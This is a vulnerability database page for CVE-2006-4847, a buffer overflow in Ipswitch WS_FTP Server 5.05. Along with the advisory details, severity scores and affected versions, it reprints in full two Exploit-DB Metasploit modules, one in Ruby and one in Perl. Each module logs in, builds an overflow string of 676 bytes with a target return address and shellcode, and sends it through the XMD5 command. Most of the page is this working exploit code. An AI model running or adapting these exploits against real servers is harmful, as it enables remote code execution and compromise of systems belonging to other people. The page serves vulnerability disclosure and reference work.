CVE-2006-4847: Detail

CVE-2006-4847

90.2%V4
Network
2006-09-18 23h00 +00:00
2017-07-19 13h57 +00:00

CVE Description

Multiple buffer overflows in Ipswitch WS_FTP Server 5.05 before Hotfix 1 allow remote authenticated users to execute arbitrary code via long (1) XCRC, (2) XSHA1, or (3) XMD5 commands.

CVE Information

Metrics

Metric   Score   Severity   CVSS Vector                   Source
V2       6.5                AV:N/AC:L/Au:S/C:P/I:P/A:P    nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood that a vulnerability will be exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVEs by their EPSS score. For example, a CVE in the 95th percentile by EPSS score is more likely to be exploited than 95% of all other CVEs. The percentile therefore serves to compare one CVE's EPSS score against those of other CVEs.

Exploit Information

Exploit Database EDB-ID: 16717

Publication date: 2010-04-29 22h00 +00:00
Author: Metasploit
EDB Verified: Yes

##
# $Id: wsftp_server_505_xmd5.rb 9179 2010-04-30 08:40:19Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
    Rank = AverageRanking

    include Msf::Exploit::Remote::Ftp

    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'Ipswitch WS_FTP Server 5.05 XMD5 Overflow',
            'Description'    => %q{
                This module exploits a buffer overflow in the XMD5 verb in IPSWITCH WS_FTP
                Server 5.05.
            },
            'Author'         => 'MC',
            'License'        => MSF_LICENSE,
            'Version'        => '$Revision: 9179 $',
            'References'     =>
                [
                    [ 'CVE', '2006-4847' ],
                    [ 'OSVDB', '28939' ],
                    [ 'BID', '20076' ],
                ],
            'Privileged'     => false,
            'Payload'        =>
                {
                    'Space'           => 300,
                    'BadChars'        => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e",
                    'StackAdjustment' => -3500,
                },
            'Platform'       => 'win',
            'Targets'        =>
                [
                    [ 'Windows 2000 Pro SP4 English', { 'Ret' => 0x7c2ec663 } ],
                    [ 'Windows XP Pro SP0 English',   { 'Ret' => 0x77dc0df0 } ],
                    [ 'Windows XP Pro SP1 English',   { 'Ret' => 0x77dc5527 } ],
                ],
            'DisclosureDate' => 'Sep 14 2006',
            'DefaultTarget'  => 0))
    end

    def check
        connect
        disconnect

        if (banner =~ /WS_FTP Server 5.0.5/)
            return Exploit::CheckCode::Vulnerable
        end
        return Exploit::CheckCode::Safe
    end

    def exploit
        connect_login

        print_status("Trying target #{target.name}...")

        sploit  = rand_text_alphanumeric(676, payload_badchars)
        sploit << [target.ret].pack('V') + payload.encoded

        send_cmd( ['XMD5', sploit] , false)

        handler
        disconnect
    end

end
Exploit Database EDB-ID: 3335

Publication date: 2007-02-18 23h00 +00:00
Author: Jacopo Cervini
EDB Verified: Yes

##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::wsftp_server_505_xmd5;
use base "Msf::Exploit";
use strict;
use Pex::Text;

my $advanced = { };

my $info = {
    'Name'     => 'WS-FTP Server 5.05 XMD5 Overflow',
    'Version'  => '$Revision: 1.0 $',
    'Authors'  => [ 'Jacopo Cervini <acaro [at] jervus.it>', ],
    'Arch'     => [ 'x86' ],
    'OS'       => [ 'win32', 'win2000', 'winxp', 'win2003' ],
    'Priv'     => 0,

    'AutoOpts' => { 'EXITFUNC' => 'thread' },

    'UserOpts' =>
      {
        'RHOST' => [1, 'ADDR', 'The target address'],
        'RPORT' => [1, 'PORT', 'The target port', 21],
        'SSL'   => [0, 'BOOL', 'Use SSL'],
        'USER'  => [1, 'DATA', 'Username', 'ftp'],
        'PASS'  => [1, 'DATA', 'Password', 'ftp'],
      },

    'Payload' =>
      {
        'Space'    => 329,
        'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e",
        'Keys'     => ['+ws2ord'],
      },

    'Description' => Pex::Text::Freeform(qq{
        This module exploits the buffer overflow found in the XMD command in IPSWITCH WS_FTP Server 5.05.
    }),

    'Refs' =>
      [
        ['BID', '20076'],
        [ 'CVE', '2006-4847' ],
      ],

    'DefaultTarget' => 0,
    'Targets' =>
      [
        ['WS-FTP Server 5.05 Universal', 0x1002e636 ], # push esp, ret in LIBEAY32.dll
      ],

    'Keys' => ['wsftp'],

    'DisclosureDate' => 'Sep 14 2006',
};

sub new {
    my $class = shift;
    my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
    return($self);
}

sub Exploit {
    my $self = shift;

    my $target_host = $self->GetVar('RHOST');
    my $target_port = $self->GetVar('RPORT');
    my $target_idx  = $self->GetVar('TARGET');
    my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
    my $target      = $self->Targets->[$target_idx];

    if (! $self->InitNops(128)) {
        $self->PrintLine("[*] Failed to initialize the NOP module.");
        return;
    }

    my $request = Pex::Text::PatternCreate(676);
    $request .= pack("V", $target->[1]);
    $request .= $shellcode;

    my $s = Msf::Socket::Tcp->new
      (
        'PeerAddr'  => $target_host,
        'PeerPort'  => $target_port,
        'LocalPort' => $self->GetVar('CPORT'),
        'SSL'       => $self->GetVar('SSL'),
      );

    if ($s->IsError) {
        $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
        return;
    }

    my $r = $s->RecvLineMulti(20);
    if (! $r) {
        $self->PrintLine("[*] No response from FTP server");
        return;
    }
    $self->Print($r);

    $s->Send("USER ".$self->GetVar('USER')."\n");
    $r = $s->RecvLineMulti(10);
    if (! $r) {
        $self->PrintLine("[*] No response from FTP server");
        return;
    }
    $self->Print($r);

    $s->Send("PASS ".$self->GetVar('PASS')."\n");
    $r = $s->RecvLineMulti(10);
    if (! $r) {
        $self->PrintLine("[*] No response from FTP server");
        return;
    }
    $self->Print($r);

    $self->PrintLine("[*] Attemping to exploit target '".$target->[0]."'...");
    $s->Send("XMD5 $request\n");
    $r = $s->RecvLineMulti(10);
    if (! $r) {
        $self->PrintLine("[*] No response from FTP server");
        return;
    }
    $self->Print($r);

    sleep(2);
    return;
}

# milw0rm.com [2007-02-19]

Products Mentioned

Configuration 0

Ipswitch >> Ws_ftp_server >> Version 1.0.1eval
Ipswitch >> Ws_ftp_server >> Version 1.0.2eval
Ipswitch >> Ws_ftp_server >> Version 3.0_1
Ipswitch >> Ws_ftp_server >> Version 4.01
Ipswitch >> Ws_ftp_server >> Version 5.02
Ipswitch >> Ws_ftp_server >> Version 5.03
Progress >> Ws_ftp_server >> Version up to (including) 5.05
Progress >> Ws_ftp_server >> Version 1.0.1
Progress >> Ws_ftp_server >> Version 1.0.1.e
Progress >> Ws_ftp_server >> Version 1.0.2
Progress >> Ws_ftp_server >> Version 1.0.2.e
Progress >> Ws_ftp_server >> Version 1.0.3
Progress >> Ws_ftp_server >> Version 1.0.4
Progress >> Ws_ftp_server >> Version 1.0.5
Progress >> Ws_ftp_server >> Version 2.0
Progress >> Ws_ftp_server >> Version 2.0.1
Progress >> Ws_ftp_server >> Version 2.0.2
Progress >> Ws_ftp_server >> Version 2.0.3
Progress >> Ws_ftp_server >> Version 2.0.4
Progress >> Ws_ftp_server >> Version 3.0
Progress >> Ws_ftp_server >> Version 3.1
Progress >> Ws_ftp_server >> Version 3.1.1
Progress >> Ws_ftp_server >> Version 3.1.2
Progress >> Ws_ftp_server >> Version 3.1.3
Progress >> Ws_ftp_server >> Version 3.4
Progress >> Ws_ftp_server >> Version 4.0
Progress >> Ws_ftp_server >> Version 4.0.2

References

http://secunia.com/advisories/21932
Tags: third-party-advisory, x_refsource_SECUNIA
http://www.vupen.com/english/advisories/2006/3655
Tags: vdb-entry, x_refsource_VUPEN
http://www.osvdb.org/28939
Tags: vdb-entry, x_refsource_OSVDB
http://www.securityfocus.com/bid/20076
Tags: vdb-entry, x_refsource_BID